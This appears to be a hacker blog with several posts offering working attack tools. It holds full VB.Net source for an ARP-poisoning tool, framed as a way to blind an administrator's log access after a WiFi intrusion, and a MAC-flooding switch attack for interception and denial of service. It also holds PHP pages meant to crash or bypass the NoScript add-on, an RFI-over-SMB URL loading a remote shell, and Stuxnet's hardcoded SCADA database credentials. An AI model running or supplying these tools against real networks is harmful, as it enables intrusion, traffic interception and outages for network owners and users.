Ack Ack
Go beyond the impossible!
ARP LAND-Attack
Aug 7th
Yeah, you know the deal.
Another network-based attack! This time, a LAND-attack (Local Area Network Denial – attack).
I know the first thing that comes to your mind is:
“LAME. With a MITM (Man-in-the-Middle), you can at least steal data, with this you simply DoS someone…”
Not so fast.
I’ve actually found this quite useful.
It requires a very small amount of packets to null-route a remote computer (remote; as in, a computer on the LAN you don’t have physical access to).
Imagine this scenario:
- You found an encrypted WiFi-network.
- You cracked it.
- You got it in and started MITM’ing.
- However! The administrator notices, and starts checking the logs.
- What to do?!
- You get paranoid and stop.
But. What if.
…the administrator is unable to access the logs?
…because his ARP-cache tells him the remote logs is on his local computer?
Whose paranoid then?
This is a PoC of how you can poison the evil-administrators routes to critical systems (the systems you’re after?); back to himself.
Imports nokitel.PCAP 'Make sure your project is running .NET 3.5; and add a reference to nokitel.dll.
Module ARP_Land_Attack
Private NIC As Adapters.Adapter = Nothing 'The NIC you will send from.
Private Adapters As New Adapters 'An instance of the NIC-enumuration.
Private TargetMAC As String 'Targets MAC-address.
Private TargetIP As Net.IPAddress 'Targets IPv4-address.
Private NullRoutes As New ArrayList 'List of addresses to disable.
Private Structure Route
Dim IP As Net.IPAddress
Dim MAC As String
End Structure
Sub Main()
ShowNICs()
ChooseNIC()
ChooseTarget() 'Who will we attack?
MakeNullroutes() 'What routes should we attack?
Nullroute() 'Attack!
End Sub
Private Sub ChooseTarget()
Dim Dummy As String = vbNullString
Do
Console.WriteLine()
Console.WriteLine("< Enter the targets IPv4:") Console.Write("> ")
Dummy = Console.ReadLine
Loop Until nokitel.Format.IsIPv4(Dummy)
TargetMAC = nokitel.Parse.ARP.GetMAC(Dummy, NIC.IP)
TargetIP = nokitel.Format.StringToIPAddress(Dummy)
End Sub
Private Sub MakeNullroutes()
Dim Dummy As String = vbNullString
Dim ExitSub As Boolean = False
Console.WriteLine()
Console.WriteLine("< Write ""start"" to poison the target.")
Do
Do
Console.WriteLine("< Enter an IPv4 to nullroute:") Console.Write("> ")
Dummy = Console.ReadLine
If Not String.IsNullOrEmpty(Dummy) Then
If nokitel.Format.RegexMatch(Dummy, "launch|start|attack|destroy|poison|kill|exterminate") Then
ExitSub = True
Exit Do
End If
End If
Loop Until nokitel.Format.IsIPv4(Dummy)
If ExitSub Then
If NullRoutes.Count > &H0 Then
Exit Do
Else
Console.WriteLine("! Enter atleast one route to poison.")
ExitSub = Not ExitSub
End If
Else
Dim Entry As New Route
With Entry
.IP = nokitel.Format.StringToIPAddress(Dummy) 'The IP-address to poison
.MAC = nokitel.Parse.ARP.GetMAC(.IP.ToString, NIC.IP) 'The corresponding MAC-address attached to the IP.
If String.IsNullOrEmpty(.MAC) Then .MAC = "00:00:00:00:00:00" 'If the ARP-request fails, we simply make a "blackhole".
End With
NullRoutes.Add(Entry) 'Add the route to the stack.
End If
Loop
Console.WriteLine()
End Sub
Private Sub Nullroute()
Dim Ethernet As New nokitel.Parse.Ethernet.Ethernet
Dim ARP As New nokitel.Parse.ARP.ARP
Dim Payload(nokitel.Parse.ARP.OFFSET) As Byte
Do
For Each Route As Route In NullRoutes
With Ethernet
.DestinationMAC = TargetMAC
.SourceMAC = nokitel.Format.RandomMAC 'Spoof that it's not us. Who knows?
.Type = nokitel.Parse.Ethernet.Ethernet_Types.ARP
End With
With ARP
.HardwareType = nokitel.Parse.ARP.HardwareType.Ethernet
.Operation = nokitel.Parse.ARP.OPCODES.Reply
.ProtocolAddressLength = &H4 'IPv4 Length (4 bytes).
.HardwareAddressLength = &H6 'MAC-address Length (6 bytes).
.ProtocolType = nokitel.Parse.ARP.ProtocolType.IP
.SenderHardwareAddress = TargetMAC 'Set the route's IP to the targets own MAC-address.
.SenderProtocolAddress = nokitel.Format.StringToIPAddress(Route.IP.ToString)
.TargetHardwareAddress = Route.MAC
.TargetProtocolAddress = nokitel.Format.StringToIPAddress(Route.IP.ToString)
Console.WriteLine("Poisoning " & TargetIP.ToString & "'s ARP-Cache ### " & Route.IP.ToString & " -=> " & TargetMAC)
End With
nokitel.Parse.Ethernet.Make(Payload, Ethernet) 'Grab the structures and convert them to raw-bytes.
nokitel.Parse.ARP.Make(Payload, ARP)
NIC.Send(Payload) 'Send the bogus packets!
Next
System.Threading.Thread.Sleep(2000) 'Sleep for a while, we don't need to be quick.
Loop
End Sub
Private Sub ShowNICs()
For Index As Integer = &H0 To Adapters.Enumurate.Length - &H1 'Loop through all available NIC's, and display their stats:
With Adapters.Enumurate(Index)
Console.WriteLine("* ID: " & Index)
Console.WriteLine("* Name: " & .Name)
Console.WriteLine("* Description: " & .Description)
Console.WriteLine("* GUID: " & .GUID)
Console.WriteLine("* Netmask: " & .Netmask)
Console.WriteLine("* Destination: " & .DestinationAddress)
Console.WriteLine("* Broadcast: " & .BroadcastAddress)
Console.WriteLine("* IP: " & .IP)
Console.WriteLine("* MAC: " & .MAC)
Console.WriteLine("* Gateway IP: " & .GatewayIP)
Console.WriteLine("* Gateway MAC: " & .GatewayMAC)
Console.WriteLine("* Supports WiFi: " & CStr(If(.IsWIFI, "Yes", "No")) & ".")
End With
Console.WriteLine()
Next
End Sub
Private Sub ChooseNIC()
Dim ID As String = vbNullString
Do
Console.Write("> ")
ID = Console.ReadLine
If IsNumeric(ID) Then
If ID >= &H0 And ID < Adapters.Enumurate.Length Then
NIC = Adapters.Enumurate(ID) 'Set the NIC-variable to the corresponding index from the "ShowNICs()" output.
If Not NIC.Open(, False) Then
Console.WriteLine("x Unable to hook device!")
End
End If
Exit Do
End If
End If
Loop
End Sub
End Module
Yeah, the code is a bit long. Sorry for that.
But I hope you understand the scenario.
Note: His ARP-Cache get restored almost instantly after you quit the attack. So no real harm done.
A pre-compiled Win32 executable can be downloaded from here.
And here’s a screenshot of how I nullified my laptop:
ARP Land Attack
Evil isn’t it?
Ciao.
Client side hacking with noscript (FF-addon) enabled
Aug 5th
While noscript is a great plugin to make your browser secure I tried finding ways to break it and succeeded.
This means that it is possible to break the browser client side while noscript is enabled (and the site(s) are disallowed).
I did not fully debugged the bugs because I am not in the mood to find browser exploits but I was trying to find ways to disable/crash the browser client side wise with noscript enabled; crashes were enough for me..
My first idea to break it was making a very very long url, this is the code I used:
<?php
echo "<script src=\"http://";
for ($a=95000; $a>=0; $a--){
echo $a;
}
echo "\">";
?>
First it loads normally, it gives a message that 1 script is blocked, no crash was found here yet.
Then when I told it to temporary allow the site firefox kept running, no sandbox which stopped me and it kept eating my CPU, I waited some minutes before I killed firefox.
Alright, time for the second attempt, let’s make tons of scripts to different locations to make it crash.
<?php
for ($a=95000; $a>=0; $a--){
echo "<script src=\"http://".$a."\"></script>";
}
?>
When you click the noscript button now it will attempt to make a drop down list of all sites, sometimes you will get a screen like this:
And sometimes it will just crash the browser, when you get the pop up and you make it stop it will show an empty drop down menu.
Another idea was to make a script to a very long port number, this made not crash the browser but gave unsuspected behavior because it would not ask to allow the script from that page but it told me the script was hosted on the localhost. Pretty weird, unfortunately I can not host something on a port number with 1000 digits to fully test this vulnerability.
I think noscript is also understanding that high port numbers are not existing or something.
After a lot of trying I noticed I entirely disabled the protection suite somehow, I was able to do XSS and such, I don’t know why and how and I investigated where it came from but somehow I made noscript allow XSS and other attack vectors after allowing a website, there are also a lot of different errors you will get when playing with this so I must have triggered something accidentally, after the reboot anything was find.
There is a funny thing with the script which generates a lot of links, try this out and it will generate an empty warning box which you can repeatedly close but it will come back every time again. First you will get a problem in the policy.js script but it doesn’t matter what you click there, your browser will be doomed anyway. Here is a screen shot of it:
Anyhow, if you manage to narrow it down then let me know, it’s pretty severe if you can just strip the protection, if I find the specific way then I will also tell it you of course.
I also tested it on different operating systems and the results and errors where different.
The reincarnation of the RFI
Aug 1st
Hey! Remember the good old days when the web spouted RFI’s everywhere?
We miss those days.
So me and Fredrik figured out a new way to reincarnate the old dusty RFI’s!
This is an unexpected feature in PHP that allows you to communicate with external servers even though allow_url_include = Off.
We eventually played around with an RFI playground we made and found out SMB is supported.
So what? SMB is only for internal networks?
Not so fast! If an attacker writes a rogue SMB server, just like Jelmer did in the “MySQL Network Exploitation Toolkit”, he could remotely load a shell or send back a malicious payload to exploit one of the many vulnerabilities against SAMBA.
This will obviously require a RFI “patch” relying on allow_url_include on the server.
vulnerable.php:
...
if(isset($_GET['file']))
{
include($_GET['file']);
}
...
Example URL:
http://www.vulnerablesite.com/includefile.php?file=\\1.3.3.7\shell.txt%00
And that’s how you may turn an LFI into an RFI using SMB.
Note: This is still a theory, no PoC available yet.
Ciao bella!
CAM Table Overflow
Jul 31st
Here comes another example on how nokitel can be used for penetration testing.
Ever heard about a CAM-Table-Overflow?
Though so.
It’s not a very common exploitation method.
This is a short description quoted from hakipedia,com:
“A switch’s CAM table contains network information such as MAC addresses available on physical switch ports and associated VLAN parameters. CAM Table Overflows occur when an influx of MAC addresses are flooded into the table and the CAM table threshold is reached. This causes the switch to act like a hub, flooding the network with traffic out all ports. The flooding caused by a CAM Table Overflow is limited to the source VLAN, thus does not affect other VLANs on the network.”
In short; a CAM-Table-Overflow against a switch results in a “degradation of service“.
The switch gets downgraded into a hub, and stays that way as long as the CAM-table keeps being overflowed.
If the MAC-flood stop, the degradation will stop as well after a short period of time.
It will eventually turn back into a fully operational mode due to nifty timeouts.
So what’s this “degradation of service” good for?
Well, a normal switch routes traffic. Period.
A hub (which the attack makes the switch turn into), broadcasts all traffic to each physical port.
And what’s so bad about that?
You got it. MITM! (Man-In-The-Middle)
CAM-Table-Overflow From Hakipedia.com
The cool thing about this attack is that the affected devices (boxes, printers, other routers, etc..) wont get their ARP-caches tampered with.
Which in turn, lowers the risk of firewalls noticing.
Clever huh?
…And here comes the PoC, written in VB.Net with the use of the nokitel library:
Imports nokitel.PCAP 'Make sure your project is running .NET 3.5; and add a reference to nokitel.dll.
Module ARP_CAM_Table_Overflow
Private NIC As Adapters.Adapter = Nothing 'The NIC you will send from.
Private Adapters As New Adapters 'An instance of the NIC-enumuration.
Sub Main()
ShowNICs()
ChooseNIC()
Console.WriteLine("! FF:FF:FF:FF:FF:FF, is the broadcast MAC-address.")
Dim Target As String = vbNullString
Do
Console.WriteLine("< Enter the targets MAC:")
Console.Write("> ")
Target = Console.ReadLine
Loop Until nokitel.Format.RegexMatch(Target, "^(([A-F0-9]){2}:){5}([A-F0-9]){2}$")
Dim Threshold As Integer = &H0
Do
Console.WriteLine("< Enter the numeric timeout in milliseconds:")
Console.Write("> ")
Dim Dummy As String = Console.ReadLine
If IsNumeric(Dummy) Then
Threshold = CInt(Dummy)
Exit Do
End If
Loop
Dim Ethernet As New nokitel.Parse.Ethernet.Ethernet
Dim ARP As New nokitel.Parse.ARP.ARP
Dim Payload(nokitel.Parse.ARP.OFFSET) As Byte
Do
With Ethernet
.DestinationMAC = Target
.SourceMAC = nokitel.Format.RandomMAC
.Type = nokitel.Parse.Ethernet.Ethernet_Types.ARP
End With
With ARP
.HardwareType = nokitel.Parse.ARP.HardwareType.Ethernet
.Operation = nokitel.Parse.ARP.OPCODES.Reply
.ProtocolAddressLength = &H4 'IPv4 Length (4 bytes).
.HardwareAddressLength = &H6 'MAC-address Length (6 bytes).
.ProtocolType = nokitel.Parse.ARP.ProtocolType.IP
.SenderHardwareAddress = nokitel.Format.RandomMAC
.SenderProtocolAddress = nokitel.Format.RandomIP
.TargetHardwareAddress = nokitel.Format.RandomMAC
.TargetProtocolAddress = nokitel.Format.RandomIP
End With
nokitel.Parse.Ethernet.Make(Payload, Ethernet)
nokitel.Parse.ARP.Make(Payload, ARP)
NIC.Send(Payload)
If Threshold > &H0 Then System.Threading.Thread.Sleep(Threshold)
Loop
End Sub
Private Sub ShowNICs()
For Index As Integer = &H0 To Adapters.Enumurate.Length - &H1 'Loop through all available NIC's, and display their stats:
With Adapters.Enumurate(Index)
Console.WriteLine("* ID: " & Index)
Console.WriteLine("* Name: " & .Name)
Console.WriteLine("* Description: " & .Description)
Console.WriteLine("* GUID: " & .GUID)
Console.WriteLine("* Netmask: " & .Netmask)
Console.WriteLine("* Destination: " & .DestinationAddress)
Console.WriteLine("* Broadcast: " & .BroadcastAddress)
Console.WriteLine("* IP: " & .IP)
Console.WriteLine("* MAC: " & .MAC)
Console.WriteLine("* Gateway IP: " & .GatewayIP)
Console.WriteLine("* Gateway MAC: " & .GatewayMAC)
Console.WriteLine("* Supports WiFi: " & CStr(If(.IsWIFI, "Yes", "No")) & ".")
End With
Console.WriteLine()
Next
End Sub
Private Sub ChooseNIC()
Dim ID As String = vbNullString
Do
Console.Write("> ")
ID = Console.ReadLine
If IsNumeric(ID) Then
If ID >= &H0 And ID < Adapters.Enumurate.Length Then
NIC = Adapters.Enumurate(ID) 'Set the NIC-variable to the corresponding index from the "ShowNICs()" output.
If Not NIC.Open(, False) Then
Console.WriteLine("x Unable to hook device!")
End
End If
Exit Do
End If
End If
Loop
End Sub
End Module
There you go!
A precompiled library can be downloaded from here. (Don’t forget to set the “target MAC-address” to the switches!)
CAM Table Overflow
I might add. If you set the threshold to 0, and enter the MAC-address of “FF:FF:FF:FF:FF:FF” (Broadcast).
It will turn into a devastating DoS (Denial of Service).
When I first coded this, i let Kasper try it out.
…And to put it short, it killed his whole network.
The Microsoft Windows Vista boxes in his network got null-routed, even after a few reboots and cleared ARP-caches.
…so did his TV.
Enough of this now!
It would be cool if you tried tinkering around with it!
That’s about it!
Ciao.
Stuxnet’s Credentials
Jul 30th
I had a hard time finding the Stuxnet-rootkit and the credentials it used to exploit the Siemens WINCC6 SCADA system.
So here you go, here’s the default credentials it used towards the WINCC6′s MSSQL Server:
Username: WinCCConnect
Password: 2WSXcderUsername: WinCCAdmin
Password: 2WSXcde.
Just for documentation.
The odds for you to stumble upon one of these systems are low.
So no harm done here! Just want it to be easier for other people who is searching for this information.
Oh, and I might add, the rootkit is stored at:
%SystemRoot%\Windows32\drivers\mrxcls.sys
…and here:
%SystemRoot%\Windows32\drivers\mrxnet.sys
Another way to detect it’s presence is to look for the odd Windows Services “MRxCls” and “MRxNet“.
It do also creates two registry entries at:
HKLM\SYSTEM\CurrentControlSet\Services\MRxCls
…and:
HKLM\SYSTEM\CurrentControlSet\Services\MRxNet
It spreads using a previously unknown security flaw in the Microsoft Windows .LNK file-extension with the use of USB-sticks.
More information about the 0-day can be found here.
That’s it. What more information do you need if you wish to code an anti-virus for this specific worm?
Oh yeah. Both the “drivers” are signed by RealTek Semiconductor Corp. Might be something to look out for as well.
It’s a pretty clever example of how dangerous malware can be when used for industrial espionage.
Anyway,
Ciao.